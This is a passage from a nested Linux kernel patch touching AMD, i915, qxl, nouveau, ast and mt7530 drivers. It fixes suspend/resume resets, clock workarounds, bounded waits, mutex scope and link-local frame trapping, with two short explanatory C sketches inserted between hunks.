++	 */
++	if (!(adev->flags & AMD_IS_APU) && adev->in_s3 &&
++	    !adev->suspend_complete) {
++		sol_reg1 = RREG32_SOC15(MP0, 0, regMP0_SMN_C2PMSG_81);
++		msleep(100);
++		sol_reg2 = RREG32_SOC15(MP0, 0, regMP0_SMN_C2PMSG_81);
++
++		return (sol_reg1 != sol_reg2);
++	}
++
++	return false;
++}
++
+ static int soc21_common_resume(void *handle)
+ {
+ 	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+ 
++	if (soc21_need_reset_on_resume(adev)) {
++		dev_info(adev->dev, "S3 suspend aborted, resetting...");
++		soc21_asic_reset(adev);
++	}
++
+ 	return soc21_common_hw_init(adev);
+ }
+ 
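
soc21_need_reset_on_resume() above detects an aborted S3 suspend by sampling a firmware-owned scratch register twice, 100 ms apart: if the value moved, the trusted OS is still running and the dGPU needs a reset before re-init. A standalone sketch of that double-sample heuristic (the fake register ticks on each read to simulate live firmware):

#include <stdbool.h>
#include <stdio.h>
#include <unistd.h>

/* stand-in for RREG32_SOC15(MP0, 0, regMP0_SMN_C2PMSG_81) */
static unsigned int fake_sol;
static unsigned int read_sol_reg(void) { return fake_sol++; }

static bool need_reset_on_resume(bool is_dgpu, bool in_s3,
				 bool suspend_complete)
{
	unsigned int sol1, sol2;

	/* only the dGPU + aborted-S3 case is suspect */
	if (!is_dgpu || !in_s3 || suspend_complete)
		return false;

	sol1 = read_sol_reg();
	usleep(100 * 1000);		/* msleep(100) in the kernel */
	sol2 = read_sol_reg();

	return sol1 != sol2;		/* register moved: firmware active */
}

int main(void)
{
	printf("reset needed: %d\n",
	       need_reset_on_resume(true, true, false));
	return 0;
}
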
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c b/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
+index 0b87034d9dd51..1b7b294264804 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
+@@ -1805,6 +1805,7 @@ static int unmap_queues_cpsch(struct device_queue_manager *dqm,
+ 		pr_err("HIQ MQD's queue_doorbell_id0 is not 0, Queue preemption time out\n");
+ 		while (halt_if_hws_hang)
+ 			schedule();
++		kfd_hws_hang(dqm);
+ 		return -ETIME;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn316/dcn316_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn316/dcn316_clk_mgr.c
+index 187f5b27fdc80..29d2003fb7129 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn316/dcn316_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn316/dcn316_clk_mgr.c
+@@ -112,20 +112,25 @@ static int dcn316_get_active_display_cnt_wa(
+ 	return display_count;
+ }
+ 
+-static void dcn316_disable_otg_wa(struct clk_mgr *clk_mgr_base, struct dc_state *context, bool disable)
++static void dcn316_disable_otg_wa(struct clk_mgr *clk_mgr_base, struct dc_state *context,
++		bool safe_to_lower, bool disable)
+ {
+ 	struct dc *dc = clk_mgr_base->ctx->dc;
+ 	int i;
+ 
+ 	for (i = 0; i < dc->res_pool->pipe_count; ++i) {
+-		struct pipe_ctx *pipe = &dc->current_state->res_ctx.pipe_ctx[i];
++		struct pipe_ctx *pipe = safe_to_lower
++			? &context->res_ctx.pipe_ctx[i]
++			: &dc->current_state->res_ctx.pipe_ctx[i];
+ 
+ 		if (pipe->top_pipe || pipe->prev_odm_pipe)
+ 			continue;
+-		if (pipe->stream && (pipe->stream->dpms_off || pipe->plane_state == NULL ||
+-				     dc_is_virtual_signal(pipe->stream->signal))) {
++		if (pipe->stream && (pipe->stream->dpms_off || dc_is_virtual_signal(pipe->stream->signal) ||
++				     !pipe->stream->link_enc)) {
+ 			if (disable) {
+-				pipe->stream_res.tg->funcs->immediate_disable_crtc(pipe->stream_res.tg);
++				if (pipe->stream_res.tg && pipe->stream_res.tg->funcs->immediate_disable_crtc)
++					pipe->stream_res.tg->funcs->immediate_disable_crtc(pipe->stream_res.tg);
++
+ 				reset_sync_context_for_pipe(dc, context, i);
+ 			} else
+ 				pipe->stream_res.tg->funcs->enable_crtc(pipe->stream_res.tg);
+@@ -222,11 +227,11 @@ static void dcn316_update_clocks(struct clk_mgr *clk_mgr_base,
+ 	}
+ 
+ 	if (should_set_clock(safe_to_lower, new_clocks->dispclk_khz, clk_mgr_base->clks.dispclk_khz)) {
+-		dcn316_disable_otg_wa(clk_mgr_base, context, true);
++		dcn316_disable_otg_wa(clk_mgr_base, context, safe_to_lower, true);
+ 
+ 		clk_mgr_base->clks.dispclk_khz = new_clocks->dispclk_khz;
+ 		dcn316_smu_set_dispclk(clk_mgr, clk_mgr_base->clks.dispclk_khz);
+-		dcn316_disable_otg_wa(clk_mgr_base, context, false);
++		dcn316_disable_otg_wa(clk_mgr_base, context, safe_to_lower, false);
+ 
+ 		update_dispclk = true;
+ 	}
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+index 6d9760eac16d8..21b374d121819 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+@@ -222,8 +222,18 @@ static int smu_v13_0_4_system_features_control(struct smu_context *smu, bool en)
+ 	struct amdgpu_device *adev = smu->adev;
+ 	int ret = 0;
+ 
+-	if (!en && !adev->in_s0ix)
++	if (!en && !adev->in_s0ix) {
++		/* Add a GFX reset as a workaround just before sending the
++		 * MP1_UNLOAD message, to prevent GC/RLC/PMFW from entering
++		 * an invalid state.
++		 */
++		ret = smu_cmn_send_smc_msg_with_param(smu, SMU_MSG_GfxDeviceDriverReset,
++						      SMU_RESET_MODE_2, NULL);
++		if (ret)
++			return ret;
++
+ 		ret = smu_cmn_send_smc_msg(smu, SMU_MSG_PrepareMp1ForUnload, NULL);
++	}
+ 
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/ast/ast_dp.c b/drivers/gpu/drm/ast/ast_dp.c
+index 56483860306b4..a4a23b9623ad3 100644
+--- a/drivers/gpu/drm/ast/ast_dp.c
++++ b/drivers/gpu/drm/ast/ast_dp.c
+@@ -190,6 +190,7 @@ void ast_dp_set_on_off(struct drm_device *dev, bool on)
+ {
+ 	struct ast_private *ast = to_ast_private(dev);
+ 	u8 video_on_off = on;
++	u32 i = 0;
+ 
+ 	// Video On/Off
+ 	ast_set_index_reg_mask(ast, AST_IO_CRTC_PORT, 0xE3, (u8) ~AST_DP_VIDEO_ENABLE, on);
+@@ -202,6 +203,8 @@ void ast_dp_set_on_off(struct drm_device *dev, bool on)
+ 						ASTDP_MIRROR_VIDEO_ENABLE) != video_on_off) {
+ 			// wait 1 ms
+ 			mdelay(1);
++			if (++i > 200)
++				break;
+ 		}
+ 	}
+ }
+diff --git a/drivers/gpu/drm/drm_client_modeset.c b/drivers/gpu/drm/drm_client_modeset.c
+index 7847020de0a49..9a65806047b5e 100644
+--- a/drivers/gpu/drm/drm_client_modeset.c
++++ b/drivers/gpu/drm/drm_client_modeset.c
+@@ -781,6 +781,7 @@ int drm_client_modeset_probe(struct drm_client_dev *client, unsigned int width,
+ 	unsigned int total_modes_count = 0;
+ 	struct drm_client_offset *offsets;
+ 	unsigned int connector_count = 0;
++	/* points to modes protected by mode_config.mutex */
+ 	struct drm_display_mode **modes;
+ 	struct drm_crtc **crtcs;
+ 	int i, ret = 0;
+@@ -849,7 +850,6 @@ int drm_client_modeset_probe(struct drm_client_dev *client, unsigned int width,
+ 		drm_client_pick_crtcs(client, connectors, connector_count,
+ 				      crtcs, modes, 0, width, height);
+ 	}
+-	mutex_unlock(&dev->mode_config.mutex);
+ 
+ 	drm_client_modeset_release(client);
+ 
+@@ -879,6 +879,7 @@ int drm_client_modeset_probe(struct drm_client_dev *client, unsigned int width,
+ 			modeset->y = offset->y;
+ 		}
+ 	}
++	mutex_unlock(&dev->mode_config.mutex);
+ 
+ 	mutex_unlock(&client->modeset_mutex);
+ out:
+diff --git a/drivers/gpu/drm/i915/display/intel_cdclk.c b/drivers/gpu/drm/i915/display/intel_cdclk.c
+index 25dcdde5feb69..5147718f38d6a 100644
+--- a/drivers/gpu/drm/i915/display/intel_cdclk.c
++++ b/drivers/gpu/drm/i915/display/intel_cdclk.c
+@@ -2152,7 +2152,7 @@ intel_set_cdclk_pre_plane_update(struct intel_atomic_state *state)
+ 				 &new_cdclk_state->actual))
+ 		return;
+ 
+-	if (pipe == INVALID_PIPE ||
++	if (new_cdclk_state->disable_pipes ||
+ 	    old_cdclk_state->actual.cdclk <= new_cdclk_state->actual.cdclk) {
+ 		drm_WARN_ON(&dev_priv->drm, !new_cdclk_state->base.changed);
+ 
+@@ -2181,7 +2181,7 @@ intel_set_cdclk_post_plane_update(struct intel_atomic_state *state)
+ 				 &new_cdclk_state->actual))
+ 		return;
+ 
+-	if (pipe != INVALID_PIPE &&
++	if (!new_cdclk_state->disable_pipes &&
+ 	    old_cdclk_state->actual.cdclk > new_cdclk_state->actual.cdclk) {
+ 		drm_WARN_ON(&dev_priv->drm, !new_cdclk_state->base.changed);
+ 
+@@ -2634,6 +2634,7 @@ static struct intel_global_state *intel_cdclk_duplicate_state(struct intel_globa
+ 		return NULL;
+ 
+ 	cdclk_state->pipe = INVALID_PIPE;
++	cdclk_state->disable_pipes = false;
+ 
+ 	return &cdclk_state->base;
+ }
+@@ -2793,6 +2794,8 @@ int intel_modeset_calc_cdclk(struct intel_atomic_state *state)
+ 		if (ret)
+ 			return ret;
+ 
++		new_cdclk_state->disable_pipes = true;
++
+ 		drm_dbg_kms(&dev_priv->drm,
+ 			    "Modeset required for cdclk change\n");
+ 	}
+diff --git a/drivers/gpu/drm/i915/display/intel_cdclk.h b/drivers/gpu/drm/i915/display/intel_cdclk.h
+index c674879a84a58..c4b3e5938bb3f 100644
+--- a/drivers/gpu/drm/i915/display/intel_cdclk.h
++++ b/drivers/gpu/drm/i915/display/intel_cdclk.h
+@@ -51,6 +51,9 @@ struct intel_cdclk_state {
+ 
+ 	/* bitmask of active pipes */
+ 	u8 active_pipes;
++
++	/* update cdclk with pipes disabled */
++	bool disable_pipes;
+ };
+ 
+ int intel_crtc_compute_min_cdclk(const struct intel_crtc_state *crtc_state);
+diff --git a/drivers/gpu/drm/i915/display/intel_ddi.c b/drivers/gpu/drm/i915/display/intel_ddi.c
+index 706e2d956801d..76277eb3eb252 100644
+--- a/drivers/gpu/drm/i915/display/intel_ddi.c
++++ b/drivers/gpu/drm/i915/display/intel_ddi.c
+@@ -3683,7 +3683,12 @@ static bool m_n_equal(const struct intel_link_m_n *m_n_1,
+ static bool crtcs_port_sync_compatible(const struct intel_crtc_state *crtc_state1,
+ 				       const struct intel_crtc_state *crtc_state2)
+ {
++	/*
++	 * FIXME the modeset sequence is currently wrong and
++	 * can't deal with bigjoiner + port sync at the same time.
++	 */
+ 	return crtc_state1->hw.active && crtc_state2->hw.active &&
++		!crtc_state1->bigjoiner_pipes && !crtc_state2->bigjoiner_pipes &&
+ 		crtc_state1->output_types == crtc_state2->output_types &&
+ 		crtc_state1->output_format == crtc_state2->output_format &&
+ 		crtc_state1->lane_count == crtc_state2->lane_count &&
+diff --git a/drivers/gpu/drm/i915/display/intel_vrr.c b/drivers/gpu/drm/i915/display/intel_vrr.c
+index 5eac99021875e..6615e4153f37a 100644
+--- a/drivers/gpu/drm/i915/display/intel_vrr.c
++++ b/drivers/gpu/drm/i915/display/intel_vrr.c
+@@ -110,6 +110,13 @@ intel_vrr_compute_config(struct intel_crtc_state *crtc_state,
+ 	if (!intel_vrr_is_capable(connector))
+ 		return;
+ 
++	/*
++	 * FIXME all joined pipes share the same transcoder.
++	 * Need to account for that during VRR toggle/push/etc.
++	 */
++	if (crtc_state->bigjoiner_pipes)
++		return;
++
+ 	if (adjusted_mode->flags & DRM_MODE_FLAG_INTERLACE)
+ 		return;
+ 
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/bios/shadowof.c b/drivers/gpu/drm/nouveau/nvkm/subdev/bios/shadowof.c
+index 4bf486b571013..cb05f7f48a98b 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/bios/shadowof.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/bios/shadowof.c
+@@ -66,11 +66,16 @@ of_init(struct nvkm_bios *bios, const char *name)
+ 	return ERR_PTR(-EINVAL);
+ }
+ 
++static void of_fini(void *p)
++{
++	kfree(p);
++}
++
+ const struct nvbios_source
+ nvbios_of = {
+ 	.name = "OpenFirmware",
+ 	.init = of_init,
+-	.fini = (void(*)(void *))kfree,
++	.fini = of_fini,
+ 	.read = of_read,
+ 	.size = of_size,
+ 	.rw = false,
+diff --git a/drivers/gpu/drm/qxl/qxl_release.c b/drivers/gpu/drm/qxl/qxl_release.c
+index 368d26da0d6a2..9febc8b73f09e 100644
+--- a/drivers/gpu/drm/qxl/qxl_release.c
++++ b/drivers/gpu/drm/qxl/qxl_release.c
+@@ -58,16 +58,56 @@ static long qxl_fence_wait(struct dma_fence *fence, bool intr,
+ 			   signed long timeout)
+ {
+ 	struct qxl_device *qdev;
++	struct qxl_release *release;
++	int count = 0, sc = 0;
++	bool have_drawable_releases;
+ 	unsigned long cur, end = jiffies + timeout;
+ 
+ 	qdev = container_of(fence->lock, struct qxl_device, release_lock);
++	release = container_of(fence, struct qxl_release, base);
++	have_drawable_releases = release->type == QXL_RELEASE_DRAWABLE;
+ 
+-	if (!wait_event_timeout(qdev->release_event,
+-				(dma_fence_is_signaled(fence) ||
+-				 (qxl_io_notify_oom(qdev), 0)),
+-				timeout))
+-		return 0;
++retry:
++	sc++;
++
++	if (dma_fence_is_signaled(fence))
++		goto signaled;
++
++	qxl_io_notify_oom(qdev);
++
++	for (count = 0; count < 11; count++) {
++		if (!qxl_queue_garbage_collect(qdev, true))
++			break;
++
++		if (dma_fence_is_signaled(fence))
++			goto signaled;
++	}
++
++	if (dma_fence_is_signaled(fence))
++		goto signaled;
++
++	if (have_drawable_releases || sc < 4) {
++		if (sc > 2)
++			/* back off */
++			usleep_range(500, 1000);
++
++		if (time_after(jiffies, end))
++			return 0;
++
++		if (have_drawable_releases && sc > 300) {
++			DMA_FENCE_WARN(fence,
++				       "failed to wait on release %llu after spincount %d\n",
++				       fence->context & ~0xf0000000, sc);
++			goto signaled;
++		}
++		goto retry;
++	}
++	/*
++	 * Match the original sync_obj_wait behaviour: give up after three
++	 * spins when have_drawable_releases is not set.
++	 */
+ 
++signaled:
+ 	cur = jiffies;
+ 	if (time_after(cur, end))
+ 		return 0;
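The qxl hunk above replaces a single wait_event_timeout() with a bounded retry loop: poll, collect garbage, back off, and give up once the deadline passes. A minimal sketch of that retry shape, using hypothetical names (poll_done, MAX_SPINS) rather than the driver's actual API:

#include <linux/jiffies.h>
#include <linux/delay.h>

#define MAX_SPINS 300	/* hypothetical cap, mirroring the sc > 300 warning */

/* Returns true if poll_done() succeeded before the deadline. */
static bool bounded_wait(bool (*poll_done)(void *), void *cookie,
			 unsigned long end)
{
	int sc = 0;

	while (!poll_done(cookie)) {
		if (++sc > 2)
			usleep_range(500, 1000);	/* back off after a few spins */
		if (time_after(jiffies, end) || sc > MAX_SPINS)
			return false;			/* deadline or spin cap hit */
	}
	return true;
}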
+diff --git a/drivers/iommu/intel/svm.c b/drivers/iommu/intel/svm.c
+index 03b25358946c4..cb862ab96873e 100644
+--- a/drivers/iommu/intel/svm.c
++++ b/drivers/iommu/intel/svm.c
+@@ -71,7 +71,7 @@ int intel_svm_enable_prq(struct intel_iommu *iommu)
+ 	struct page *pages;
+ 	int irq, ret;
+ 
+-	pages = alloc_pages(GFP_KERNEL | __GFP_ZERO, PRQ_ORDER);
++	pages = alloc_pages_node(iommu->node, GFP_KERNEL | __GFP_ZERO, PRQ_ORDER);
+ 	if (!pages) {
+ 		pr_warn("IOMMU: %s: Failed to allocate page request queue\n",
+ 			iommu->name);
+diff --git a/drivers/media/cec/core/cec-adap.c b/drivers/media/cec/core/cec-adap.c
+index 4bc2a705029e6..c761ac35e120d 100644
+--- a/drivers/media/cec/core/cec-adap.c
++++ b/drivers/media/cec/core/cec-adap.c
+@@ -1121,20 +1121,6 @@ void cec_received_msg_ts(struct cec_adapter *adap,
+ 	if (valid_la && min_len) {
+ 		/* These messages have special length requirements */
+ 		switch (cmd) {
+-		case CEC_MSG_TIMER_STATUS:
+-			if (msg->msg[2] & 0x10) {
+-				switch (msg->msg[2] & 0xf) {
+-				case CEC_OP_PROG_INFO_NOT_ENOUGH_SPACE:
+-				case CEC_OP_PROG_INFO_MIGHT_NOT_BE_ENOUGH_SPACE:
+-					if (msg->len < 5)
+-						valid_la = false;
+-					break;
+-				}
+-			} else if ((msg->msg[2] & 0xf) == CEC_OP_PROG_ERROR_DUPLICATE) {
+-				if (msg->len < 5)
+-					valid_la = false;
+-			}
+-			break;
+ 		case CEC_MSG_RECORD_ON:
+ 			switch (msg->msg[2]) {
+ 			case CEC_OP_RECORD_SRC_OWN:
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 07065c1af55e4..d4515c19a5f34 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -998,20 +998,173 @@ static void mt7530_setup_port5(struct dsa_switch *ds, phy_interface_t interface)
+ 	mutex_unlock(&priv->reg_mutex);
+ }
+ 
+-/* On page 205, section "8.6.3 Frame filtering" of the active standard, IEEE Std
+- * 802.1Q™-2022, it is stated that frames with 01:80:C2:00:00:00-0F as MAC DA
+- * must only be propagated to C-VLAN and MAC Bridge components. That means
+- * VLAN-aware and VLAN-unaware bridges. On the switch designs with CPU ports,
+- * these frames are supposed to be processed by the CPU (software). So we make
+- * the switch only forward them to the CPU port. And if received from a CPU
+- * port, forward to a single port. The software is responsible of making the
+- * switch conform to the latter by setting a single port as destination port on
+- * the special tag.
++/* In Clause 5 of IEEE Std 802-2014, two sublayers of the data link layer (DLL)
++ * of the Open Systems Interconnection basic reference model (OSI/RM) are
++ * described: the medium access control (MAC) and logical link control (LLC)
++ * sublayers. The MAC sublayer is the one facing the physical layer.
+  *
+- * This switch intellectual property cannot conform to this part of the standard
+- * fully. Whilst the REV_UN frame tag covers the remaining :04-0D and :0F MAC
+- * DAs, it also includes :22-FF which the scope of propagation is not supposed
+- * to be restricted for these MAC DAs.
++ * In 8.2 of IEEE Std 802.1Q-2022, the Bridge architecture is described. A
++ * Bridge component comprises a MAC Relay Entity for interconnecting the Ports
++ * of the Bridge, at least two Ports, and higher layer entities with at least a
++ * Spanning Tree Protocol Entity included.
++ *
++ * Each Bridge Port also functions as an end station and shall provide the MAC
++ * Service to an LLC Entity. Each instance of the MAC Service is provided to a
++ * distinct LLC Entity that supports protocol identification, multiplexing, and
++ * demultiplexing, for protocol data unit (PDU) transmission and reception by
++ * one or more higher layer entities.
++ *
++ * It is described in 8.13.9 of IEEE Std 802.1Q-2022 that in a Bridge, the LLC
++ * Entity associated with each Bridge Port is modeled as being directly
++ * connected to the attached Local Area Network (LAN).
++ *
++ * On the switch with CPU port architecture, CPU port functions as Management
++ * Port, and the Management Port functionality is provided by software which
++ * functions as an end station. Software is connected to an IEEE 802 LAN that is
++ * wholly contained within the system that incorporates the Bridge. Software
++ * provides access to the LLC Entity associated with each Bridge Port by the
++ * value of the source port field on the special tag on the frame received by
++ * software.
++ *
++ * We call frames that carry control information to determine the active
++ * topology and current extent of each Virtual Local Area Network (VLAN), i.e.,
++ * spanning tree or Shortest Path Bridging (SPB) and Multiple VLAN Registration
++ * Protocol Data Units (MVRPDUs), and frames from other link constrained
++ * protocols, such as Extensible Authentication Protocol over LAN (EAPOL) and
++ * Link Layer Discovery Protocol (LLDP), link-local frames. They are not
++ * forwarded by a Bridge. Permanently configured entries in the filtering
++ * database (FDB) ensure that such frames are discarded by the Forwarding
++ * Process. In 8.6.3 of IEEE Std 802.1Q-2022, this is described in detail:
++ *
++ * Each of the reserved MAC addresses specified in Table 8-1
++ * (01-80-C2-00-00-[00,01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F]) shall be
++ * permanently configured in the FDB in C-VLAN components and ERs.
++ *
++ * Each of the reserved MAC addresses specified in Table 8-2
++ * (01-80-C2-00-00-[01,02,03,04,05,06,07,08,09,0A,0E]) shall be permanently
++ * configured in the FDB in S-VLAN components.
++ *
++ * Each of the reserved MAC addresses specified in Table 8-3
++ * (01-80-C2-00-00-[01,02,04,0E]) shall be permanently configured in the FDB in
++ * TPMR components.
++ *
++ * The FDB entries for reserved MAC addresses shall specify filtering for all
++ * Bridge Ports and all VIDs. Management shall not provide the capability to
++ * modify or remove entries for reserved MAC addresses.
++ *
++ * The addresses in Table 8-1, Table 8-2, and Table 8-3 determine the scope of
++ * propagation of PDUs within a Bridged Network, as follows:
++ *
++ *   The Nearest Bridge group address (01-80-C2-00-00-0E) is an address that no
++ *   conformant Two-Port MAC Relay (TPMR) component, Service VLAN (S-VLAN)
++ *   component, Customer VLAN (C-VLAN) component, or MAC Bridge can forward.
++ *   PDUs transmitted using this destination address, or any other addresses
++ *   that appear in Table 8-1, Table 8-2, and Table 8-3
++ *   (01-80-C2-00-00-[00,01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F]), can
++ *   therefore travel no further than those stations that can be reached via a
++ *   single individual LAN from the originating station.
++ *
++ *   The Nearest non-TPMR Bridge group address (01-80-C2-00-00-03), is an
++ *   address that no conformant S-VLAN component, C-VLAN component, or MAC
++ *   Bridge can forward; however, this address is relayed by a TPMR component.
++ *   PDUs using this destination address, or any of the other addresses that
++ *   appear in both Table 8-1 and Table 8-2 but not in Table 8-3
++ *   (01-80-C2-00-00-[00,03,05,06,07,08,09,0A,0B,0C,0D,0F]), will be relayed by
++ *   any TPMRs but will propagate no further than the nearest S-VLAN component,
++ *   C-VLAN component, or MAC Bridge.
++ *
++ *   The Nearest Customer Bridge group address (01-80-C2-00-00-00) is an address
++ *   that no conformant C-VLAN component or MAC Bridge can forward; however, it is
++ *   relayed by TPMR components and S-VLAN components. PDUs using this
++ *   destination address, or any of the other addresses that appear in Table 8-1
++ *   but not in either Table 8-2 or Table 8-3 (01-80-C2-00-00-[00,0B,0C,0D,0F]),
++ *   will be relayed by TPMR components and S-VLAN components but will propagate
++ *   no further than the nearest C-VLAN component or MAC Bridge.
++ *
++ * Because the LLC Entity associated with each Bridge Port is provided via CPU
++ * port, we must not filter these frames but forward them to CPU port.
++ *
++ * In a Bridge, the transmission Port is majorly decided by ingress and egress
++ * rules, FDB, and spanning tree Port State functions of the Forwarding Process.
++ * For link-local frames, only CPU port should be designated as destination port
++ * in the FDB, and the other functions of the Forwarding Process must not
++ * interfere with the decision of the transmission Port. We call this process
++ * trapping frames to CPU port.
++ *
++ * Therefore, on the switch with CPU port architecture, link-local frames must
++ * be trapped to CPU port, and certain link-local frames received by a Port of a
++ * Bridge comprising a TPMR component or an S-VLAN component must be excluded
++ * from it.
++ *
++ * A Bridge of the switch with CPU port architecture cannot comprise a Two-Port
++ * MAC Relay (TPMR) component as a TPMR component supports only a subset of the
++ * functionality of a MAC Bridge. A Bridge comprising two Ports (Management Port
++ * doesn't count) of this architecture will either function as a standard MAC
++ * Bridge or a standard VLAN Bridge.
++ *
++ * Therefore, a Bridge of this architecture can only comprise S-VLAN components,
++ * C-VLAN components, or MAC Bridge components. Since there's no TPMR component,
++ * we don't need to relay PDUs using the destination addresses specified on the
++ * Nearest non-TPMR section, nor the portion of the Nearest Customer Bridge
++ * section where they must be relayed by TPMR components.
++ *
++ * One option to trap link-local frames to CPU port is to add static FDB entries
++ * with CPU port designated as destination port. However, because
++ * Independent VLAN Learning (IVL) is used on every VID, each entry only
++ * applies to a single VLAN Identifier (VID). For a Bridge comprising a MAC
++ * Bridge component or a C-VLAN component, there would have to be 16 times 4096
++ * entries. This switch intellectual property can only hold a maximum of 2048
++ * entries. Using this option, there also isn't a mechanism to prevent
++ * link-local frames from being discarded when the spanning tree Port State of
++ * the reception Port is discarding.
++ *
++ * The remaining option is to utilise the BPC, RGAC1, RGAC2, RGAC3, and RGAC4
++ * registers. Whilst this applies to every VID, it doesn't contain all of the
++ * reserved MAC addresses without affecting the remaining Standard Group MAC
++ * Addresses. The REV_UN frame tag utilised using the RGAC4 register covers the
++ * remaining 01-80-C2-00-00-[04,05,06,07,08,09,0A,0B,0C,0D,0F] destination
++ * addresses. It also includes the 01-80-C2-00-00-22 to 01-80-C2-00-00-FF
++ * destination addresses which may be relayed by MAC Bridges or VLAN Bridges.
++ * The latter option provides better but not complete conformance.
++ *
++ * This switch intellectual property also does not provide a mechanism to trap
++ * link-local frames with specific destination addresses to CPU port by Bridge,
++ * to conform to the filtering rules for the distinct Bridge components.
++ *
++ * Therefore, regardless of the type of the Bridge component, link-local frames
++ * with these destination addresses will be trapped to CPU port:
++ *
++ * 01-80-C2-00-00-[00,01,02,03,0E]
++ *
++ * In a Bridge comprising a MAC Bridge component or a C-VLAN component:
++ *
++ *   Link-local frames with these destination addresses won't be trapped to CPU
++ *   port which won't conform to IEEE Std 802.1Q-2022:
++ *
++ *   01-80-C2-00-00-[04,05,06,07,08,09,0A,0B,0C,0D,0F]
++ *
++ * In a Bridge comprising an S-VLAN component:
++ *
++ *   Link-local frames with these destination addresses will be trapped to CPU
++ *   port which won't conform to IEEE Std 802.1Q-2022:
++ *
++ *   01-80-C2-00-00-00
++ *
++ *   Link-local frames with these destination addresses won't be trapped to CPU
++ *   port which won't conform to IEEE Std 802.1Q-2022:
++ *
++ *   01-80-C2-00-00-[04,05,06,07,08,09,0A]
++ *
++ * To trap link-local frames to CPU port as conformantly as this switch
++ * intellectual property allows, link-local frames are made to be regarded as
++ * Bridge Protocol Data Units (BPDUs). This is because this switch intellectual
++ * property only lets the frames regarded as BPDUs bypass the spanning tree Port
++ * State function of the Forwarding Process.
++ *
++ * The only remaining interference is the ingress rules. When the reception Port
++ * has no PVID assigned on software, VLAN-untagged frames won't be allowed in.
++ * There doesn't seem to be a mechanism on the switch intellectual property to
++ * have link-local frames bypass this function of the Forwarding Process.
+  */
+ static void
+ mt753x_trap_frames(struct mt7530_priv *priv)
+@@ -1019,35 +1172,43 @@ mt753x_trap_frames(struct mt7530_priv *priv)
+ 	/* Trap 802.1X PAE frames and BPDUs to the CPU port(s) and egress them
+ 	 * VLAN-untagged.
+ 	 */
+-	mt7530_rmw(priv, MT753X_BPC, MT753X_PAE_EG_TAG_MASK |
+-		   MT753X_PAE_PORT_FW_MASK | MT753X_BPDU_EG_TAG_MASK |
+-		   MT753X_BPDU_PORT_FW_MASK,
+-		   MT753X_PAE_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
+-		   MT753X_PAE_PORT_FW(MT753X_BPDU_CPU_ONLY) |
+-		   MT753X_BPDU_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
+-		   MT753X_BPDU_CPU_ONLY);
++	mt7530_rmw(priv, MT753X_BPC,
++		   MT753X_PAE_BPDU_FR | MT753X_PAE_EG_TAG_MASK |
++			   MT753X_PAE_PORT_FW_MASK | MT753X_BPDU_EG_TAG_MASK |
++			   MT753X_BPDU_PORT_FW_MASK,
++		   MT753X_PAE_BPDU_FR |
++			   MT753X_PAE_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++			   MT753X_PAE_PORT_FW(MT753X_BPDU_CPU_ONLY) |
++			   MT753X_BPDU_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++			   MT753X_BPDU_CPU_ONLY);
+ 
+ 	/* Trap frames with :01 and :02 MAC DAs to the CPU port(s) and egress
+ 	 * them VLAN-untagged.
+ 	 */
+-	mt7530_rmw(priv, MT753X_RGAC1, MT753X_R02_EG_TAG_MASK |
+-		   MT753X_R02_PORT_FW_MASK | MT753X_R01_EG_TAG_MASK |
+-		   MT753X_R01_PORT_FW_MASK,
+-		   MT753X_R02_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
+-		   MT753X_R02_PORT_FW(MT753X_BPDU_CPU_ONLY) |
+-		   MT753X_R01_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
+-		   MT753X_BPDU_CPU_ONLY);
++	mt7530_rmw(priv, MT753X_RGAC1,
++		   MT753X_R02_BPDU_FR | MT753X_R02_EG_TAG_MASK |
++			   MT753X_R02_PORT_FW_MASK | MT753X_R01_BPDU_FR |
++			   MT753X_R01_EG_TAG_MASK | MT753X_R01_PORT_FW_MASK,
++		   MT753X_R02_BPDU_FR |
++			   MT753X_R02_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++			   MT753X_R02_PORT_FW(MT753X_BPDU_CPU_ONLY) |
++			   MT753X_R01_BPDU_FR |
++			   MT753X_R01_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++			   MT753X_BPDU_CPU_ONLY);
+ 
+ 	/* Trap frames with :03 and :0E MAC DAs to the CPU port(s) and egress
+ 	 * them VLAN-untagged.
+ 	 */
+-	mt7530_rmw(priv, MT753X_RGAC2, MT753X_R0E_EG_TAG_MASK |
+-		   MT753X_R0E_PORT_FW_MASK | MT753X_R03_EG_TAG_MASK |
+-		   MT753X_R03_PORT_FW_MASK,
+-		   MT753X_R0E_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
+-		   MT753X_R0E_PORT_FW(MT753X_BPDU_CPU_ONLY) |
+-		   MT753X_R03_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
